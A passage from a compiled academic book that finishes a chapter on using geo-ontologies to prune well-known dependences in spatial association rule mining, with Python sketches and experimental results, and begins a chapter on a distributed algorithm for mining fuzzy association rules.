contains(Hospital), crosses(Water Body)}, and size 4 {contains(Port), contains(Hospital), contains(Street), crosses(Water Body)}. Rules 1 and 2 are generated from
Table 5. Large predicate sets with 50% minimum support
Table 6. Examples of association rules with frequent sets of size 2, 3, and 4 having the geographic dependence
the set with two elements, and represent a single geographic dependence and its inverse. Rules 3, 4, 5, and 6 reproduce rules 1 and 2 with an additional element in the antecedent or the consequent of the rule. The same happens with frequent sets that contain 4 elements. Rules 7, 8, and 9 are rules 1 and 2 with two additional elements that, combined with the dependence, reached minimum support. Approaches that reduce the number of rules and eliminate redundant rules (Zaki, 2000) do not warrant the elimination of all association rules that contain geographic dependences. Existing algorithms for mining frequent geographic patterns and generating strong spatial association rules make use of semantic knowledge neither to specify which spatial relationships should be computed in data preprocessing nor to reduce the number of well-known patterns. Koperski and Han (1995) reduce the number of rules using minimum support during the predicate generation. Clementini et al. (2000) presented a similar method for mining association rules from geographic objects with broad boundaries. Appice et al. (2005) reduce the number of rules with user-specified pattern constraints, which require a lot of background knowledge from the data mining user. This method is inefficient since pattern constraints are applied in postprocessing steps, after both frequent sets and association rules have already been generated.
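To make the replication effect concrete, the hedged sketch below (toy predicate names) enumerates every rule derivable from one frequent predicate set and counts how many of them carry a given dependence; in this case every single rule does, which is exactly why pruning only after rule generation is wasteful.

```python
# Hedged sketch: enumerating all rules X -> Y derivable from one frequent set.
# Every rule derived from a frequent set that contains the dependence also
# contains it, since antecedent and consequent together cover the whole set.
from itertools import combinations

def rules_from_frequent_set(frequent_set):
    items = sorted(frequent_set)
    for r in range(1, len(items)):
        for antecedent in combinations(items, r):
            yield set(antecedent), frequent_set - set(antecedent)

frequent = {"contains(Port)", "contains(Hospital)",
            "contains(Street)", "crosses(Water Body)"}
dependence = {"contains(Port)", "crosses(Water Body)"}

rules = list(rules_from_frequent_set(frequent))
with_dependence = [(x, y) for x, y in rules if dependence <= (x | y)]
print(len(rules), "rules in total;", len(with_dependence), "carry the dependence")
# 14 rules in total; 14 carry the dependence
```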
Because of the dependence replication process in both frequent sets and association rules, shown in Table 5 and Table 6 respectively, it might be difficult for the data mining user to analyze all rules to discover if they are really interesting or not. To help the data mining user, in the following section we present a framework to remove all well known geographic dependences, warranting that no association rules with such dependences will be generated.
A FRAMEWORK FOR GEOGRAPHIC DATA PREPROCESSING AND SPATIAL ASSOCIATION RULE MINING WITH ONTOLOGIES

Recently (Bogorny et al., 2005b, 2006a, 2006b, 2006c), we introduced the idea of using semantic knowledge for reducing spatial joins and well-known patterns in SAR mining. In Bogorny et al. (2006a) we proposed to eliminate well-known patterns between the target feature type and relevant feature types with intelligent geographic data preprocessing. In data preprocessing, however, not all well-known dependences can be removed. We therefore presented a frequent pattern mining algorithm that uses semantic knowledge to eliminate dependences among relevant feature
Figure 6. A framework for mining frequent geographic patterns using ontologies
types during the frequent set generation (Bogorny et al., 2006b). In Bogorny et al. (2006c) we proposed an integrated framework, which eliminates geographic dependences completely in both data preprocessing and frequent pattern generation, using geographic database schemas as prior knowledge. This section presents an interoperable framework for geographic data preprocessing and spatial association rule mining using geographic ontologies. Ontologies are used not only to eliminate well-known dependences, but also to verify which spatial relationships should be computed in the spatial predicate computation. Figure 6 shows the framework, which can be viewed in three levels: data repository, data preprocessing, and data mining. At the bottom are the geographic data repositories: the knowledge repository, which stores geo-ontologies, and the geographic databases, stored in GDBMS (geographic database management systems) constructed under OGC specifications. Following the OGC specifications (Open GIS Consortium, 1999b) makes our framework interoperable with all GDBMS constructed under OGC specifications (e.g., Oracle, PostGIS, MySQL, etc.).
At the center is the spatial data preparation level, which covers the gap between data mining tools and geographic databases. At this level, data and knowledge repositories are accessed through JDBC/ODBC connections and data are retrieved, preprocessed, and transformed into the single table format. At this level, dependences between the target feature and relevant features are removed, as described in the next section. On top are the data mining toolkits or algorithms for mining frequent patterns and generating association rules. At this level, a new method for mining frequent geographic patterns is presented. Dependences among relevant feature types that can only be removed inside the data mining algorithm are eliminated during the frequent set generation, as will be explained later in this section.
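For concreteness, the sketch below shows one way the data preparation level could talk to an OGC-compliant repository from Python (using a native driver rather than the JDBC/ODBC connections mentioned above). It assumes the psycopg2 driver and a PostGIS database; the connection string, table names, and column names are invented, and any other OGC-compliant GDBMS would expose equivalent metadata and spatial operators.

```python
# Hedged sketch: reading OpenGIS metadata and running one spatial join against
# a PostGIS database. Connection parameters and table/column names are
# assumptions; geometry_columns and ST_Crosses are standard PostGIS/OGC features.
import psycopg2

conn = psycopg2.connect("dbname=gisdb user=miner password=secret")
cur = conn.cursor()

# Feature Selection: geometry_columns lists the candidate relevant feature types.
cur.execute("SELECT f_table_name, f_geometry_column, type FROM geometry_columns")
for table, geom_column, geom_type in cur.fetchall():
    print(f"candidate feature type: {table} ({geom_type}, column {geom_column})")

# Spatial Join: which districts (target feature type) cross water resources?
cur.execute("""
    SELECT d.name, w.name
    FROM districts d
    JOIN water_resources w ON ST_Crosses(d.geom, w.geom)
""")
for district, water in cur.fetchall():
    print(f"crosses({district}, {water})")

cur.close()
conn.close()
```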
Data Preprocessing: Using Semantics to Eliminate Geographic Dependences Between the Target Feature Type and the Relevant Feature Types

There are four main steps to implement the tasks of geographic data preprocessing for association
rule mining: Feature Selection, Dependence Elimination, Spatial Join, and Transformation. The Feature Selection step retrieves all relevant information from the database such that the user can choose the target feature type T, the target feature nonspatial attributes, and the set S of relevant feature types that may have some influence on T. The feature types as well as their geometric attributes are retrieved through the OpenGIS database schema metadata, stored in the relation geometry_columns (see Bogorny et al., 2005a, for details). The algorithm that implements the remaining data preprocessing steps is presented in Figure 7. The Dependence Elimination step searches the ontology φ and verifies the properties of T. If T has a mandatory dependence M with any O in S, then O is eliminated from the set S of relevant feature types. Notice that for each relevant feature type removed from the set S, no spatial
join is required to extract spatial relationships. By consequence, no spatial association rule will be generated with this relevant feature type. If a prohibited relationship P is defined between T and O in the ontology φ, then the set of possible relationships to compute for data mining is given by D(T,O) = R – P(T,O), where R is the set of all topological relationships R = {touches, contains, within, crosses, overlaps, equals, disjoint}. If there is no property of T in φ that relates T and O, then all relationships are computed. The Spatial Join step computes the spatial relationships D between T and all remaining O in S. Spatial joins D to extract spatial predicates are performed on-the-fly with operations provided by the GIS. The Transformation step transposes as well as discretizes the Spatial Join module output (Ψ) into the single table format understandable to association rule mining algorithms.
Figure 7. Pseudo-code of the data preprocessing algorithm
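The sketch below is not the pseudo-code of Figure 7 itself, but a minimal Python rendering of the Dependence Elimination logic described above. The constraint entries and feature-type names are illustrative; in the framework they would be retrieved from the geo-ontology rather than hard-coded.

```python
# Hedged sketch of the Dependence Elimination step: relevant feature types with
# a mandatory constraint are dropped from S, prohibited relationships are
# subtracted from R, and D(T, O) = R - P(T, O) is what the Spatial Join step
# still has to compute for each remaining O.
R = {"touches", "contains", "within", "crosses", "overlaps", "equals", "disjoint"}

# Constraints as they could be read from the geo-ontology (illustrative values).
MANDATORY = {("City", "Street")}                          # one-one / one-many
PROHIBITED = {("City", "River"): {"within", "equals"}}    # prohibited relations P

def dependence_elimination(target, relevant_types):
    remaining, to_compute = [], {}
    for o in relevant_types:
        if (target, o) in MANDATORY:
            continue                      # well-known dependence: drop O, no join
        remaining.append(o)
        to_compute[o] = R - PROHIBITED.get((target, o), set())   # D(T, O)
    return remaining, to_compute

S = ["Street", "River", "Factory"]
remaining, D = dependence_elimination("City", S)
print("relevant feature types kept:", remaining)          # ['River', 'Factory']
print("relationships to compute for River:", sorted(D["River"]))
```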
Frequent Pattern Generation: Using Semantics to Eliminate Geographic Dependences Among Relevant Features

Frequent pattern and association rule mining algorithms, with rare exceptions (Han, Pei & Yin, 2000), generate candidates and frequent sets. The candidate generation in spatial data mining is not a problem because the number of predicates is much smaller than the number of items in transactional databases (Shekhar & Chawla, 2003). Moreover, the computational cost lies in the spatial join computation. Approaches that generate closed frequent sets first compute the frequent sets and then verify whether they are closed. Although they reduce the number of frequent sets, they do not warrant the elimination of well-known geographic patterns. In SAR mining, it is more important to warrant that the resulting frequent sets are free of well-known dependences, in order to generate more interesting patterns, than to reduce the number of frequent sets. Apriori (Agrawal & Srikant, 1994) has been the basis for dozens of algorithms for mining spatial and nonspatial frequent sets and association rules. We will illustrate the method of geographic dependence elimination during the
frequent set generation using Apriori, as shown in Figure 8. We propose to remove from the candidate sets all pairs of elements that have geographic dependences. As in Apriori, multiple passes are performed over the dataset. In the first pass, the support of the individual elements is computed to determine the large 1-predicate sets. In the subsequent passes, given k as the number of the current pass, the large/frequent sets Lk-1 found in the previous pass (k-1) are grouped into sets Ck with k elements, which are called candidate sets. Then the support of each candidate set is computed, and if it is equal to or higher than the minimum support, the set is considered frequent. This process continues until the number of frequent sets is zero. Similarly to Srikant and Agrawal (1995), who eliminate in the second pass candidate sets that contain both a parent and its child as specified in concept hierarchies, we eliminate all candidate sets that contain geographic dependences, but independently of any concept hierarchy. The dependences are eliminated in an efficient way, when generating candidates with 2 elements and before checking their frequency. If the pairs of predicates (e.g., contains(Port), contains(Water Body)) contain feature types (e.g., Port, Water Body) that have a mandatory constraint in the
Figure 8. Frequent set generation function
ontology φ, then all pairs of predicates with a dependence in φ are removed from C2. According to Assertion 1, this step warrants that the pairs of geographic objects that have a mandatory constraint in the ontology φ will appear together neither in the frequent sets nor in the spatial association rules. This makes the method effective independently of other thresholds, and it clearly improves efficiency, since fewer frequent sets are generated. The main strength of this method in our framework is its simplicity. This single, but very effective and efficient, step removes all well-known geographic dependences, and it can be implemented by any algorithm that generates frequent sets. Considering the example of frequent sets shown in Table 5, the dependence is eliminated when it appears for the first time, such that no larger frequent sets or association rules with the dependence will be generated.
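The sketch below is not the authors' implementation, only a toy Apriori-style level-wise search illustrating the idea: candidate pairs whose predicates form a known dependence are discarded before their support is counted, and the standard subset check then keeps the dependence from re-entering at higher levels. The dataset and dependence list are invented.

```python
# Hedged sketch: frequent set generation with semantic pruning of candidate
# 2-predicate sets. The pruned dependence cannot reappear in larger sets
# because every (k-1)-subset of a candidate must itself be frequent.
from itertools import combinations

def frequent_sets_with_pruning(rows, dependences, minsup):
    def support(s):
        return sum(s <= row for row in rows) / len(rows)

    items = {p for row in rows for p in row}
    level = {frozenset([p]) for p in items if support(frozenset([p])) >= minsup}
    all_frequent, k = list(level), 2
    while level:
        candidates = {a | b for a, b in combinations(level, 2) if len(a | b) == k}
        if k == 2:
            # Semantic pruning: drop pairs that form a well-known dependence.
            candidates = {c for c in candidates
                          if not any(dep <= c for dep in dependences)}
        # Standard Apriori pruning: every (k-1)-subset must itself be frequent.
        candidates = {c for c in candidates
                      if all(frozenset(s) in level for s in combinations(c, k - 1))}
        level = {c for c in candidates if support(c) >= minsup}
        all_frequent.extend(level)
        k += 1
    return all_frequent

rows = [frozenset(r) for r in (
    {"contains(Port)", "crosses(Water Body)", "contains(Street)"},
    {"contains(Port)", "crosses(Water Body)", "contains(Street)", "contains(Hospital)"},
    {"contains(Street)", "contains(Hospital)"},
)]
dependences = [frozenset({"contains(Port)", "crosses(Water Body)"})]
for fs in frequent_sets_with_pruning(rows, dependences, minsup=0.5):
    print(sorted(fs))
```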
Experiments and Evaluation

In order to evaluate the interoperability of the framework, experiments were performed with real geographic databases stored under Oracle 10g and PostGIS. Districts, a database table with 109 polygons and nonspatial attributes, such as population and sanitary condition, was defined as the target feature type T. Datasets with different relevant feature types (e.g., bus routes with 4,062 multilines, slums with 513 polygons, water resources with 1,030 multilines, and gas stations with 450 points) were preprocessed and mined, using ontologies and without using ontologies.

Estimating the time reduction to compute spatial joins for mining frequent patterns is very difficult, since this step is completely data dependent. The computational time reduction to extract spatial joins depends on three main aspects: how many dependences (relevant feature types) are eliminated in data preprocessing; the geometry type of the relevant feature (point, line, or polygon); and the number of instances of the eliminated feature type (e.g., 60,000 rows). For example, if a relevant feature type with 57,580 polygons is eliminated, spatial join computation would significantly decrease. If the eliminated feature type has 3,062 points, time reduction would be less significant. However, for every relevant feature type eliminated, no spatial join is necessary, and this warrants preprocessing time reduction.

To evaluate the frequent pattern reduction by pruning the input space, Figure 9 describes an experiment performed with Apriori, where 2 dependences between the reference object type and the relevant feature types were eliminated. Notice that input space pruning reduces frequent patterns independently of minimum support.

Figure 9. Frequent sets generated with input space pruning
Considering minsup values of 10%, 15%, and 20%, the elimination of one single dependence pruned the frequent sets by around 50%. The elimination of two dependences reduced the number of frequent sets by 75%. The rule reduction is even more significant, as can be observed in Figure 10, reaching around 70% when one dependence is removed and 90% when two dependences are eliminated, independently of minimum support. Algorithms that generate closed frequent sets and eliminate nonredundant rules can reduce the number of both frequent sets and association rules still further if applied to the geographic domain using our method for pruning the input space. Figure 11 shows the result of an experiment where two dependences among relevant feature
types were eliminated during the frequent set generation, but without input pruning. Notice that even using ontologies only in the frequent set generation, we get a reduction in the number of frequent sets independently of minimum support. Moreover, the higher the number of dependences, the more significant the reduction. Figure 12 shows an experiment where dependences were eliminated both in the input space (between the target feature and relevant features) and during the frequent set generation (among relevant features). The total number of frequent sets is reduced by more than 50% by removing one single dependence, independently of minimum support. Using ontologies we completely eliminate well-known dependences, and very efficiently.
Figure 10. Spatial association rules with input space pruning and 70% minimum confidence (number of rules per minimum support, without ontology and with one or two dependences removed)
Figure 11. Frequent sets generated with frequent set pruning (number of frequent sets per minimum support, without ontologies and with one or two dependences removed)
Figure 12. Frequent sets generated with input space and frequent set pruning (number of frequent sets per minimum support, without ontologies and with one dependence removed in the input space plus one during frequent set generation)
FUTURE TRENDS

Data mining techniques to extract knowledge from large spatial and nonspatial databases have mainly considered syntactic constraints and the data by themselves, without considering semantics. The result is that the same geographic dependences that are well known by GDB designers and explicitly represented in GDB schemas and geo-ontologies to warrant the consistency of the data are extracted by data mining algorithms, which should discover only novel and useful patterns. When dealing with geographic data, which are semantically interdependent by their very nature, the meaning of the data needs to be considered, at least to avoid the extraction of well-known patterns. There is an emerging necessity to consider semantic geographic domain knowledge in spatial data mining. The large amount of knowledge explicitly represented in geographic database schemas and spatio-temporal ontologies needs to be incorporated into data mining techniques, since they provide a valuable source of domain knowledge. How to use this knowledge in data mining systems and for which purposes are still open problems. In this chapter, we presented an efficient solution, addressing a small fraction of these problems. We used geo-ontologies in spatial association rule mining to reduce well-known pat-
terns, but the use of ontologies in different data mining techniques such as clustering, classification, and outlier detection are still open problems. In clustering, for example, the use of semantics could either avoid the separation of geographic objects that have mandatory constraints or organize them into the same cluster without the need of computing their relationship. The use of prior knowledge to evaluate the interestingness of patterns extracted with the different data mining techniques still needs to be addressed. The development of toolkits that integrate data mining techniques, geographic databases, and knowledge repositories is another need for practical applications. Although a large number of algorithms has been proposed, their implementation in toolkits with friendly graphical user interfaces that cover the whole KDD process is rare. The gap between data mining techniques and geographic databases is still a problem that makes geographic data preprocessing be the most effort and time consuming step for knowledge discovery in these databases.
CONCLUSION

This chapter presented an intelligent framework for geographic data preprocessing and SAR mining using geo-ontologies as prior knowledge. The
knowledge refers to mandatory and prohibited semantic geographic constraints, which are explicitly represented in geo-ontologies because they are part of the concepts of geographic data. We showed that explicit mandatory relationships produce irrelevant patterns, and that prohibited relationships do not need to be computed, since they will never hold if the database is consistent. Possible implicit spatial relationships may lead to more interesting patterns and rules, and they can be inferred using geo-ontologies. Experiments showed that, independently of the number of elements, one dependence is enough to prune a large number of patterns and rules, and the higher the number of eliminated semantic constraints, the larger the frequent pattern and rule reduction. We showed that well-known dependences can be partially eliminated with intelligent data preprocessing, independently of the algorithm to be used for frequent pattern mining. To completely eliminate geographic dependences, we presented a pruning method that can be applied to any algorithm that generates frequent sets, including closed frequent sets. Algorithms for mining nonredundant association rules can reduce the number of rules further if applied to the geographic domain using our method to generate frequent sets. Considering semantics in geographic data preprocessing and frequent pattern mining has three main advantages: spatial relationships between feature types with dependences are not computed; the number of both frequent sets and association rules is significantly reduced; and, most important, the generated frequent sets and rules are free of associations that are known in advance to be noninteresting. The main contribution of the method presented in this chapter for mining spatial association rules is for the data mining user, who will have to analyze far fewer obvious rules. The method is effective independently of other thresholds, and warrants that well-known geographic domain associations will not appear among the resultant set of rules.
ACKNOWLEDGMENT

The authors would like to thank both CAPES and CNPq, which partially provided the financial support for this research; Procempa, for the geographic database; and Nodo XLDB da Linguateca of Universidade de Lisboa, for the geographic ontology. Our special thanks to Mariusa Warpechowski and Daniela Leal Musa for the ontology modeling support, and to Sandro da Silva Camargo for the support with the data mining algorithms.
REFERENCES

Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In P. Buneman & S. Jajodia (Eds.), ACM SIGMOD International Conference on Management of Data (Vol. 20, pp. 207-216). New York: ACM Press. Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules in large databases. In J.B. Bocca, M. Jarke, & C. Zaniolo (Eds.), International Conference on Very Large Databases (Vol. 20, pp. 487-499). San Francisco: Morgan Kaufmann Publishers. Appice, A., Berardi, M., Ceci, M., & Malerba, D. (2005). Mining and filtering multilevel spatial association rules with ARES. In M. Hacid, N. V. Murray, Z. W. Ras, & S. Tsumoto (Eds.), Foundations of Intelligent Systems, 15th International Symposium ISMIS, Vol. 3488 (pp. 342-353). Berlin: Springer. Bogorny, V., & Iochpe, C. (2001). Extending the OpenGIS model to support topological integrity constraints. In M. Mattoso & G. Xexéo (Eds.), 16th Brazilian Symposium in Databases (pp. 2539). Rio de Janeiro: COPPE/UFRJ. Bogorny, V., Engel, P. M., & Alvares, L.O. (2005a). A reuse-based spatial data preparation framework
for data mining. In J. Debenham & K. Zhang (Eds.), 15th International Conference on Software Engineering and Knowledge Engineering (pp. 649-652). Taipei: Knowledge Systems Institute. Bogorny, V., Engel, P. M., & Alvares, L.O. (2005b). Towards the reduction of spatial join for knowledge discovery in geographic databases using geo-ontologies and spatial integrity constraints. In M. Ackermann, B. Berendt, M. Grobelink, & V. Avatek (Eds.), ECML/PKDD 2nd Workshop on Knowledge Discovery and Ontologies (pp. 51-58). Porto. Bogorny, V., Engel, P. M., & Alvares, L.O. (2006a). GeoARM: An interoperable framework to improve geographic data preprocessing and spatial association rule mining. In Proceedings of the 18th International Conference on Software Engineering and Knowledge Engineering (pp. 70-84). San Francisco: Knowledge Systems Institute. Bogorny, V., Camargo, S., Engel, P., M., & Alvares, L.O. (2006b). Towards elimination of well known geographic domain patterns in spatial association rule mining. In Proceedings of the 3rd IEEE International Conference on Intelligent Systems (pp. 532-537). London: IEEE Computer Society. Bogorny, V., Camargo, S., Engel, P., & Alvares, L. O. (2006c). Mining frequent geographic patterns with knowledge constraints. In 14th ACM International Symposium on Advances in Geographic Information Systems. Arlington, November (to appear). Chaves, M. S., Silva, M. J., & Martins, B. (2005a). A geographic knowledge base for semantic web applications. In C. A. Heuser (Ed.), 20th Brazilian Symposium on Databases (pp. 40-54). Uberlandia: UFU. Chaves, M. S., Silva, M. J., & Martins, B. (2005b). GKB—Geographic Knowledge Base. (TR05-12). DI/FCUL.
Clementini, E., Di Felice, P., & van Oosterom, P. (1993). A small set of formal topological relationships for end-user interaction. In D.J. Abel & B.C. Ooi (Eds.), Advances in Spatial Databases, 3rd International Symposium, 692 (pp. 277-295). Singapore: Springer. Cockcroft, S. (1997). A taxonomy of spatial data integrity constraints. Geoinformatica, 1(4), 327-343. Clementini, E., Di Felice, P., & Koperski, K. (2000). Mining multiple-level spatial association rules for objects with a broad boundary. Data & Knowledge Engineering, 34(3), 251-270. Egenhofer, M., & Franzosa, R. (1995). On the equivalence of topological relations. International Journal of Geographical Information Systems, 9(2), 133-152. Ester, M., Frommelt, A., Kriegel, H.-P., & Sander, J. (2000). Spatial data mining: Database primitives, algorithms and efficient DBMS support. Journal of Data Mining and Knowledge Discovery, 4(2-3), 193-216. Fayyad, U., Piatetsky-Shapiro, G., & Smyth, P. (1996). From data mining to knowledge discovery in databases. AI Magazine, 17(3), 37-54. Gruber, T. R. (1993). Towards principles for the design of ontologies used for knowledge sharing. Formal ontology in conceptual analysis and knowledge representation. International Journal of Human-Computer Studies, 43, 907-928. Guarino, N. (1998). Formal ontology and information systems. In N. Guarino (Ed.), International Conference on Formal Ontology in Information Systems (pp. 3-15). Trento: IOS Press. Han, J., & Fu, Y. (1995). Discovery of multiple-level association rules from large databases. In U. Dayal, P.M.D. Gray, & S. Nishio (Eds.), International Conference on Very Large Data Bases (pp. 420-431). Zurich: Morgan-Kaufmann.
Han, J., Koperski, K., & Stefanovic, N. (1997). GeoMiner: A system prototype for spatial data mining. In J. Peckham (Ed.), ACM SIGMOD International Conference on Management of Data, 26 (pp. 553-556). Tucson: ACM Press. Han, J., Pei, J., & Yin, Y. (2000). Mining frequent patterns without candidate generation. In J. Chen, F. Naughton, & P.A. Bernstein (Eds.), 20th ACM SIGMOD International Conference on Management of Data (pp. 1-12). Dallas: ACM. Huang, Y., Shekhar, S., & Xiong, H. (2004). Discovering co-location patterns from spatial datasets: A general approach. IEEE Transactions on Knowledge and Data Engineering, 16(12), 1472-1485. Koperski, K., & Han, J. (1995). Discovery of spatial association rules in geographic information databases. In M.J. Egenhofer & J.R. Herring (Eds.), 4th International Symposium on Large Geographical Databases, 951 (pp. 47-66). Portland: Springer. Lu, W., Han, J., & Ooi, B. C. (1993). Discovery of general knowledge in large spatial databases. In Far East Workshop on Geographic Information Systems (pp. 275-289). Singapore. Open GIS Consortium. (1999a). Topic 5, the OpenGIS abstract specification—OpenGIS features—Version 4. Retrieved August 20, 2005, from http://www.OpenGIS.org/techno/specs.htm Open GIS Consortium. (1999b). Open GIS simple features specification for SQL. Retrieved August 20, 2005, from http://www.opengeospatial.org/specs Open GIS Consortium. (2001). Feature geometry. Retrieved August 20, 2005, from http://www.opengeospatial.org/specs Pasquier, N., Bastide, Y., Taouil, R., & Lakhal, L. (1999). Discovering frequent closed itemsets for association rules. In C. Beeri & P. Buneman (Eds.), 7th International Conference on Database Theory, 1540 (pp. 398-416). Jerusalem: Springer.
Servigne, S., Ubeda, T., Puricelli, A., & Laurini, R. (2000). A methodology for spatial consistency improvement of geographic databases. Geoinformatica, 4(1), 7-34. Shekhar, S., & Chawla, S. (2003). Spatial databases: A tour. Upper Saddle River, NJ: Prentice Hall. Srikant, R., & Agrawal, R. (1995). Mining generalized association rules. In U. Dayal, P. M. D. Gray, & S. Nishio (Eds.), Proceedings of the 21st International Conference on Very Large Databases (pp. 407-419). Zurich: Morgan Kaufmann. Yoo, J. S., & Shekhar, S. (2006). A join-less approach for mining spatial co-location patterns. IEEE Transactions on Knowledge and Data Engineering, 18(10). Zaki, M. (2000). Generating non-redundant association rules. In S.J. Simoff & O. R. Zaïane (Eds.), Proceedings of the 6th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (pp. 34-43). Boston: ACM Press. Zaki, M., & Hsiao, C. (2002). CHARM: An efficient algorithm for closed itemset mining. In R.L. Grossman, J. Han, V. Kumar, H. Mannila, & R. Motwani (Eds.), Proceedings of the 2nd SIAM International Conference on Data Mining (pp. 457-473). Arlington: SIAM.
ADDITIONAL READING Bernstein, A., Provost, Foster J., & Hill, S. (2005). Toward intelligent assistance for a data mining process: An ontology-based approach for cost-sensitive classification. IEEE Transactions on Knowledge and. Data Engineering, 17(4), 503-518. Bogorny, V., Valiati, J.F., Camargo, S.S., Engel, P.M., Kuijpers, B., & Alvares, L.O. (2006). Mining maximal generalized frequent geographic patterns with knowledge constraints. Sixth IEEE Interna-
2425
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
tional Conference on Data Mining (pp. 813-817). Hong Kong: IEEE Computer Society. Bogorny, V. (2006). Enhancing spatial association rule mining in geographic databases. PhD Thesis. Porto Alegre, Brazil: Instituto de Informatica—UFRGS. Chen, X., Zhou, X., Scherl, R.B., & Geller, J. (2003). Using an interest ontology for improved support in rule mining. In Y. Kambayashi, M. K. Mohania, & W. Wolfram (Eds), Fifth International Conference on Data WareHouse and Knowledge Discovery (pp. 320-329). Prague: Springer. Farzanyar, Z., Kangavari, M., & Hashemi, S. (2006). A new algorithm for mining fuzzy association rules in the large databases based on ontology. Workshops Proceedings of the 6th IEEE International Conference on Data Mining (pp. 65-69). Hong Kong: IEEE Computer Society. Jozefowska, J., Lawrynowicz, A., & Lukaszewski, T. (2006). Frequent pattern discovery from OWL DLP knowledge bases. In S. Staab & V. Sv (Eds). International Conference on Managing Knowledge in a World of Networks (pp. 287-302). Czech Republic: Springer.
Knowledge Discovery and Ontologies. (2004). ECML/PKDD Workshop. Retrieved February 12, 2006, from http://olp.dfki.de/pkdd04/cfp.htm Knowledge Discovery and Ontologies. (2005). ECML/PKDD Workshop. Retrieved February 12, 2006, from http://webhosting.vse.cz/svatek/ KDO05 Mennis, J., & Peuquet, D.J. (2003). The role of knowledge representation in geographic knowledge discovery: A case study. Transactions in GIS, 7(3), 371-391. Singh, P., & Lee, Y. (2003). Context-based data mining using ontologies. In I. Song, S.W. Liddle, T. Wang Ling, & P. Scheuermann (Eds.), International Conference on Conceptual Modeling (pp. 405-418). Chicago: Springer. Xu, W., & Huang, H. (2006). Research and application of spatio-temporal data mining based on ontology. First International Conference on Innovative Computing, Infroamtion and Control, (pp. 535-538). Los Alamitos: IEEE Computer Society. Yu, S., Aufaure, M. Cullot, N., & Spaccapietra, S. (2003). Location-based spatial modelling using ontology. Sixth AGILE Conference on Geographic Information Science. Lyon, France.
This work was previously published in Data Mining with Ontologies: Implementations, Findings, and Frameworks, edited by H. Nigro, S. Cisaro, and D. Xodo, pp. 160-181, copyright 2008 by Information Science Reference (an imprint of IGI Global).
Chapter 8.4
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases Wai-Ho Au Microsoft Corporation, USA
ABSTRACT

The mining of fuzzy association rules has been proposed in the literature recently. Many of the ensuing algorithms are developed to make use of only a single processor or machine. They can be further enhanced by taking advantage of the scalability of parallel or distributed computer systems. The increasing ability to collect data and the resulting huge data volume make the exploitation of parallel or distributed systems increasingly important to the success of fuzzy association rule mining algorithms. This chapter proposes a new distributed algorithm, called DFARM, for mining fuzzy association rules from very large databases. Unlike many existing algorithms that adopt the support-confidence framework, in which an association is considered interesting if it satisfies some user-specified minimum percentage thresholds, DFARM embraces an objective measure to distinguish interesting associations from uninteresting ones. This measure is defined as a function of the
difference in the actual and the expected number of tuples characterized by different linguistic variables (attributes) and linguistic terms (attribute values). Given a database, DFARM first divides it into several horizontal partitions and assigns them to different sites in a distributed system. It then has each site scan its own database partition to obtain the number of tuples characterized by different linguistic variables and linguistic terms (i.e., the local counts), and exchange the local counts with all the other sites to find the global counts. Based on the global counts, the values of the interestingness measure are computed, and the sites can uncover interesting associations. By repeating this process of counting, exchanging counts, and calculating the interestingness measure, it unveils the underlying interesting associations hidden in the data. We implemented DFARM in a distributed system and used a popular benchmark data set to evaluate its performance. The results show that it has very good size-up, speedup, and scale-up performance. We also evaluated the effectiveness
of the proposed interestingness measure on two synthetic data sets. The experimental results show that it is very effective in differentiating between interesting and uninteresting associations.
INTRODUCTION

Of the many different kinds of patterns that can be discovered in a database, the mining of association rules has been studied extensively in the literature (see, e.g., J. Han & Kamber, 2001; Hand, Mannila, & Smyth, 2001). This is because the uncovering of the underlying association relationships (or simply associations) hidden in the data enables other important problems, such as classification (Au & Chan, 2001; Liu, Hsu, & Ma, 1998), to be tackled more effectively. The problem of discovering interesting associations in databases was originally defined over binary or Boolean data (Agrawal, Imielinski, & Swami, 1993). It was then extended to cover many real-life databases comprising both discrete- and continuous-valued data (Srikant & Agrawal, 1996). An association that is considered interesting is typically expressed in the form of a rule X → Y, where X and Y are conjunctions of conditions. A condition is either Ai = ai, where ai is a value in the domain of attribute Ai if Ai is discrete, or ai ∈ [li, ui], where li and ui are values in the domain of attribute Ai if Ai is continuous. The association rule X → Y holds with support, which is defined as the percentage of tuples satisfying X and Y, and confidence, which is defined as the percentage of tuples satisfying Y given that they also satisfy X. An example of an association rule is Gender = Female ∧ Age ∈ [20, 25] ∧ Income ∈ [15,000, 20,000] → Occupation = Cashier, which describes that a woman whose age is between 20 and 25 and whose income is between $15,000 and $20,000 is likely a cashier. To handle continuous attributes, many data
mining algorithms (e.g., Liu et al., 1998; Srikant & Agrawal, 1996) require their domains to be discretized into a finite number of intervals. These intervals may not be concise and meaningful enough for human experts to obtain comprehensive knowledge from the discovered association rules. Instead of using intervals, many researchers propose to employ fuzzy sets to represent the underlying relationships hidden in the data (Au & Chan, 2001, 2003; Carrasco, Vila, Galindo, & Cubero, 2000; Chan & Au, 1997, 2001; Delgado, Marín, Sánchez, & Vila, 2003; Hirota & Pedrycz, 1999; Hong, Kuo, & Chi, 1999; Kuok, Fu, & Wong, 1998; Maimon, Kandel, & Last, 1999; Yager, 1991; Zhang, 1999). The association rules involving fuzzy sets are commonly known as fuzzy association rules. An example of a fuzzy association rule is given in the following: Gender = Female ∧ Age = Young ∧ Income = Small → Occupation = Cashier, where Gender, Age, Income, and Occupation are linguistic variables, and Female, Young, Small, and Cashier are linguistic terms. This rule states that a young woman whose income is small is likely a cashier. In comparison to its counterpart involving discretized intervals, it is easier for human users to understand. The use of fuzzy sets also buries the boundaries of the adjacent intervals. This makes fuzzy association rules resilient to the inherent noise present in the data, for instance, the inaccuracy in physical measurements of real-world entities. Many of the ensuing algorithms, including those in (Au & Chan, 2001, 2003; Chan & Au, 1997, 2001; Delgado et al., 2003; Hong et al., 1999; Kuok et al., 1998; Zhang, 1999), are developed to make use of only a single processor or machine. They can be further enhanced by taking advantage of the scalability of parallel or distributed computer systems. Because of the increasing ability to collect data and the resulting huge data volume, the exploitation of
